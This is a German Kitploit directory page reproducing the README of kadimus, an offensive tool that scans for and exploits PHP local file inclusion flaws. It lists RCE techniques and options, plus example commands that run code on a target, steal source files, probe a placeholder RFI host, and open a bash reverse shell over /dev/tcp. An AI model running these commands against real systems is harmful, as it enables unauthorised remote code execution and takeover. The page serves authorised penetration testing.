Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
kadimus — kadimus ist ein Tool zum Überprüfen und Ausnutzen von LFI-Schwachstellen. | Kitploit
Tools/GitHubGitHub/p0cl4bs/kadimus
SchwachstellenscannerCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolArchived
GitHubp0cl4bs/kadimus

kadimus

kadimus ist ein Tool zum Überprüfen und Ausnutzen von LFI-Schwachstellen.

Repository anzeigen
575127vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

LFI Scan & Exploit-Tool

kadimus ist ein Werkzeug zur Überprüfung und Ausnutzung von LFI-Schwachstellen, mit Schwerpunkt auf PHP-Systemen.

Features:

  • Alle URL-Parameter prüfen
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • Offenlegung des Quellcodes
  • Befehls-Shell-Schnittstelle über HTTP-Anfrage
  • Proxy-Unterstützung (socks4://, socks4a://, socks5://, socks5h:// und http://)
  • Proxy-socks5-Unterstützung für Remote-Verbindungen

Kompilieren:

Stellen Sie zunächst sicher, dass alle Abhängigkeiten in Ihrem System installiert sind: libcurl, libopenssl, libpcre und libssh.

Anschließend können Sie das Repository klonen, um den Quellcode zu erhalten:

root@kitploit:~
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus

Und schließlich:

root@kitploit:~
$ make

Optionen:

root@kitploit:~
Options:
  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry NUMBER              Number of times to retry if connection fails
    --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)

  Scanner:
    -u, --url STRING            URL to scan/exploit
    -o, --output FILE           File to save output results

  Explotation:
    --parameter STRING          Parameter name to inject exploit
                                (only needed by RCE data and source disclosure)

  RCE:
    -T, --technique=TECH        LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP request

    --connect STRING            IP/hostname to connect to
    -p, --port NUMBER           Port number to connect to or listen on
    -l, --listen                Bind and listen for incoming connections

    --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)
    --ssh-target STRING         Set the SSH host

    RCE Available techniques

      environ                   Try to run PHP code using /proc/self/environ
      input                     Try to run PHP code using php://input
      auth                      Try to run PHP code using /var/log/auth.log
      data                      Try to run PHP code using data://text
      expect                    Try to run a command using expect://cmd

    Source Disclosure:
      -S, --source              Try to get the source file using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (default: stdout)

Beispiele:

Scanning:

root@kitploit:~
./kadimus -u localhost/?pg=contact -A my_user_agent

Get source code of file:

root@kitploit:~
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg

Execute php code:

root@kitploit:~
./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input

Execute command:

root@kitploit:~
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost

Überprüfung auf RFI:

Sie können auch auf RFI-Fehler prüfen -- setzen Sie einfach die Remote-URL in resource/common_files.txt und den Regex, um sie zu identifizieren, Beispiel:

root@kitploit:~
/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in Datei:

root@kitploit:~
http://bad-url.com/shell.txt?:scorpion say get over here

Reverse Shell:

root@kitploit:~
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0

Mitwirken

Sie können mit Code oder durch Spenden helfen. Wenn Sie mit Code helfen möchten, verwenden Sie den Kernel-Code-Stil als Referenz.

Paypal:

BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

Tool herunterladen